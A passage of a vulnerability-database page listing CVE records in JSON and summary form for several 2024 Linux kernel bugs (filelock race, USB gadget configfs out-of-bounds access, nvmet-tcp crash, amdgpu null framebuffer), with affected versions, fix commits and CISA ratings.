              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.319",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.101",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.42",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.319",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.101",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.42",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfilelock: Remove locks reliably when fcntl/close race is detected\n\nWhen fcntl_setlk() races with close(), it removes the created lock with\ndo_lock_file_wait().\nHowever, LSMs can allow the first do_lock_file_wait() that created the lock\nwhile denying the second do_lock_file_wait() that tries to remove the lock.\nSeparately, posix_lock_file() could also fail to\nremove a lock due to GFP_KERNEL allocation failure (when splitting a range\nin the middle).\n\nAfter the bug has been triggered, use-after-free reads will occur in\nlock_get_status() when userspace reads /proc/locks. This can likely be used\nto read arbitrary kernel memory, but can\u0027t corrupt kernel memory.\n\nFix it by calling locks_remove_posix() instead, which is designed to\nreliably get rid of POSIX locks associated with the given file and\nfiles_struct and is also used by filp_flush()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:20:04.810Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d30ff33040834c3b9eee29740acd92f9c7ba2250"
        },
        {
          "url": "https://git.kernel.org/stable/c/dc2ce1dfceaa0767211a9d963ddb029ab21c4235"
        },
        {
          "url": "https://git.kernel.org/stable/c/5661b9c7ec189406c2dde00837aaa4672efb6240"
        },
        {
          "url": "https://git.kernel.org/stable/c/52c87ab18c76c14d7209646ccb3283b3f5d87b22"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef8fc41cd6f95f9a4a3470f085aecf350569a0b3"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f5d0799eb0a01d550c21b7894e26b2d9db55763"
        },
        {
          "url": "https://git.kernel.org/stable/c/b6d223942c34057fdfd8f149e763fa823731b224"
        },
        {
          "url": "https://git.kernel.org/stable/c/3cad1bc010416c6dd780643476bc59ed742436b9"
        }
      ],
      "title": "filelock: Remove locks reliably when fcntl/close race is detected",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41012",
    "datePublished": "2024-07-23T08:06:02.579Z",
    "dateReserved": "2024-07-12T12:17:45.611Z",
    "dateUpdated": "2025-11-03T21:59:16.069Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42236 (GCVE-0-2024-42236)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2026-01-05 10:52

Title

usb: gadget: configfs: Prevent OOB read/write in usb_string_copy()

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: configfs: Prevent OOB read/write in usb_string_copy() Userspace provided string 's' could trivially have the length zero. Left unchecked this will firstly result in an OOB read in the form `if (str[0 - 1] == '\n') followed closely by an OOB write in the form `str[0 - 1] = '\0'`. There is already a validating check to catch strings that are too long. Let's supply an additional check for invalid strings that are too short.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a444c3fc264119801…
	https://git.kernel.org/stable/c/c95fbdde87e39e5e0…
	https://git.kernel.org/stable/c/e8474a10c535e6a20…
	https://git.kernel.org/stable/c/72b8ee0d9826e8ed0…
	https://git.kernel.org/stable/c/2d16f63d8030903e5…
	https://git.kernel.org/stable/c/d1205033e912f9332…
	https://git.kernel.org/stable/c/eecfefad0953b2f31…
	https://git.kernel.org/stable/c/6d3c721e686ea6c59…

Impacted products

Vendor

Product

Version

Linux

Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < a444c3fc264119801575ab086e03fb4952f23fd0 (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < c95fbdde87e39e5e0ae27f28bf6711edfb985caa (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < e8474a10c535e6a2024c3b06e37e4a3a23beb490 (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < 72b8ee0d9826e8ed00e0bdfce3e46b98419b37ce (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < 2d16f63d8030903e5031853e79d731ee5d474e70 (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < d1205033e912f9332c1dbefa812e6ceb0575ce0a (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < eecfefad0953b2f31aaefa058f7f348ff39c4bba (git)
Affected: 88af8bbe4ef781031ad3370847553f3b42ba0076 , < 6d3c721e686ea6c59e18289b400cc95c76e927e0 (git)

Linux

Affected: 3.10
Unaffected: 0 , < 3.10 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.100 , ≤ 6.1.* (semver)
Unaffected: 6.6.41 , ≤ 6.6.* (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42236",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:14:04.317460Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:32.140Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:37.767Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/configfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a444c3fc264119801575ab086e03fb4952f23fd0",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "c95fbdde87e39e5e0ae27f28bf6711edfb985caa",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "e8474a10c535e6a2024c3b06e37e4a3a23beb490",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "72b8ee0d9826e8ed00e0bdfce3e46b98419b37ce",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "2d16f63d8030903e5031853e79d731ee5d474e70",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "d1205033e912f9332c1dbefa812e6ceb0575ce0a",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "eecfefad0953b2f31aaefa058f7f348ff39c4bba",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            },
            {
              "lessThan": "6d3c721e686ea6c59e18289b400cc95c76e927e0",
              "status": "affected",
              "version": "88af8bbe4ef781031ad3370847553f3b42ba0076",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/configfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.10"
            },
            {
              "lessThan": "3.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.100",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.41",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.100",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.41",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: configfs: Prevent OOB read/write in usb_string_copy()\n\nUserspace provided string \u0027s\u0027 could trivially have the length zero. Left\nunchecked this will firstly result in an OOB read in the form\n`if (str[0 - 1] == \u0027\\n\u0027) followed closely by an OOB write in the form\n`str[0 - 1] = \u0027\\0\u0027`.\n\nThere is already a validating check to catch strings that are too long.\nLet\u0027s supply an additional check for invalid strings that are too short."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:05.655Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a444c3fc264119801575ab086e03fb4952f23fd0"
        },
        {
          "url": "https://git.kernel.org/stable/c/c95fbdde87e39e5e0ae27f28bf6711edfb985caa"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8474a10c535e6a2024c3b06e37e4a3a23beb490"
        },
        {
          "url": "https://git.kernel.org/stable/c/72b8ee0d9826e8ed00e0bdfce3e46b98419b37ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d16f63d8030903e5031853e79d731ee5d474e70"
        },
        {
          "url": "https://git.kernel.org/stable/c/d1205033e912f9332c1dbefa812e6ceb0575ce0a"
        },
        {
          "url": "https://git.kernel.org/stable/c/eecfefad0953b2f31aaefa058f7f348ff39c4bba"
        },
        {
          "url": "https://git.kernel.org/stable/c/6d3c721e686ea6c59e18289b400cc95c76e927e0"
        }
      ],
      "title": "usb: gadget: configfs: Prevent OOB read/write in usb_string_copy()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42236",
    "datePublished": "2024-08-07T15:14:25.642Z",
    "dateReserved": "2024-07-30T07:40:12.252Z",
    "dateUpdated": "2026-01-05T10:52:05.655Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46737 (GCVE-0-2024-46737)

Vulnerability from cvelistv5 – Published: 2024-09-18 07:11 – Updated: 2025-11-03 22:17

Title

nvmet-tcp: fix kernel crash if commands allocation fails

Summary

In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: fix kernel crash if commands allocation fails If the commands allocation fails in nvmet_tcp_alloc_cmds() the kernel crashes in nvmet_tcp_release_queue_work() because of a NULL pointer dereference. nvmet: failed to install queue 0 cntlid 1 ret 6 Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 Fix the bug by setting queue->nr_cmds to zero in case nvmet_tcp_alloc_cmd() fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/03e1fd0327fa5e217…
	https://git.kernel.org/stable/c/50632b877ce55356f…
	https://git.kernel.org/stable/c/91dad30c5607e6286…
	https://git.kernel.org/stable/c/7957c731fc2b23312…
	https://git.kernel.org/stable/c/489f2913a63f528cf…
	https://git.kernel.org/stable/c/6c04d1e3ab22cc539…
	https://git.kernel.org/stable/c/5572a55a6f830ee3f…

Impacted products

Vendor

Product

Version

Linux

Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 03e1fd0327fa5e2174567f5fe9290fe21d21b8f4 (git)
Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 50632b877ce55356f5d276b9add289b1e7ddc683 (git)
Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 91dad30c5607e62864f888e735d0965567827bdf (git)
Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 7957c731fc2b23312f8935812dee5a0b14b04e2d (git)
Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 489f2913a63f528cfe3f21722583fb981967ecda (git)
Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 6c04d1e3ab22cc5394ef656429638a5947f87244 (git)
Affected: 872d26a391da92ed8f0c0f5cb5fef428067b7f30 , < 5572a55a6f830ee3f3a994b6b962a5c327d28cb3 (git)

Linux

Affected: 5.0
Unaffected: 0 , < 5.0 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46737",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T14:52:30.516681Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T14:52:46.426Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:17:20.599Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/nvme/target/tcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "03e1fd0327fa5e2174567f5fe9290fe21d21b8f4",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            },
            {
              "lessThan": "50632b877ce55356f5d276b9add289b1e7ddc683",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            },
            {
              "lessThan": "91dad30c5607e62864f888e735d0965567827bdf",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            },
            {
              "lessThan": "7957c731fc2b23312f8935812dee5a0b14b04e2d",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            },
            {
              "lessThan": "489f2913a63f528cfe3f21722583fb981967ecda",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            },
            {
              "lessThan": "6c04d1e3ab22cc5394ef656429638a5947f87244",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            },
            {
              "lessThan": "5572a55a6f830ee3f3a994b6b962a5c327d28cb3",
              "status": "affected",
              "version": "872d26a391da92ed8f0c0f5cb5fef428067b7f30",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/nvme/target/tcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.0"
            },
            {
              "lessThan": "5.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: fix kernel crash if commands allocation fails\n\nIf the commands allocation fails in nvmet_tcp_alloc_cmds()\nthe kernel crashes in nvmet_tcp_release_queue_work() because of\na NULL pointer dereference.\n\n  nvmet: failed to install queue 0 cntlid 1 ret 6\n  Unable to handle kernel NULL pointer dereference at\n         virtual address 0000000000000008\n\nFix the bug by setting queue-\u003enr_cmds to zero in case\nnvmet_tcp_alloc_cmd() fails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:33:05.372Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/03e1fd0327fa5e2174567f5fe9290fe21d21b8f4"
        },
        {
          "url": "https://git.kernel.org/stable/c/50632b877ce55356f5d276b9add289b1e7ddc683"
        },
        {
          "url": "https://git.kernel.org/stable/c/91dad30c5607e62864f888e735d0965567827bdf"
        },
        {
          "url": "https://git.kernel.org/stable/c/7957c731fc2b23312f8935812dee5a0b14b04e2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/489f2913a63f528cfe3f21722583fb981967ecda"
        },
        {
          "url": "https://git.kernel.org/stable/c/6c04d1e3ab22cc5394ef656429638a5947f87244"
        },
        {
          "url": "https://git.kernel.org/stable/c/5572a55a6f830ee3f3a994b6b962a5c327d28cb3"
        }
      ],
      "title": "nvmet-tcp: fix kernel crash if commands allocation fails",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46737",
    "datePublished": "2024-09-18T07:11:59.300Z",
    "dateReserved": "2024-09-11T15:12:18.257Z",
    "dateUpdated": "2025-11-03T22:17:20.599Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-41093 (GCVE-0-2024-41093)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:48 – Updated: 2025-11-03 22:00

Title

drm/amdgpu: avoid using null object of framebuffer

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: avoid using null object of framebuffer Instead of using state->fb->obj[0] directly, get object from framebuffer by calling drm_gem_fb_get_obj() and return error code when object is null to avoid using null object of framebuffer.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7f35e01cb0ea4d295…
	https://git.kernel.org/stable/c/6ce0544cabaa60801…
	https://git.kernel.org/stable/c/330c8c1453848c04d…
	https://git.kernel.org/stable/c/dd9ec0ea4cdde0fc4…
	https://git.kernel.org/stable/c/bcfa48ff785bd1213…

Impacted products

Vendor

Product

Version

Linux

Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 6ce0544cabaa608018d5922ab404dc656a9d8447 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < 330c8c1453848c04d335bad81371a66710210800 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46 (git)
Affected: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 , < bcfa48ff785bd121316592b131ff6531e3e696bb (git)

Linux

Affected: 4.2
Unaffected: 0 , < 4.2 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:00:50.813Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7f35e01cb0ea4d295f5c067bb5c67dfcddaf05bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6ce0544cabaa608018d5922ab404dc656a9d8447"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/330c8c1453848c04d335bad81371a66710210800"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd9ec0ea4cdde0fc48116e63969fc83e81d7ef46"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bcfa48ff785bd121316592b131ff6531e3e696bb"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41093",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:20:32.237829Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:55.898Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
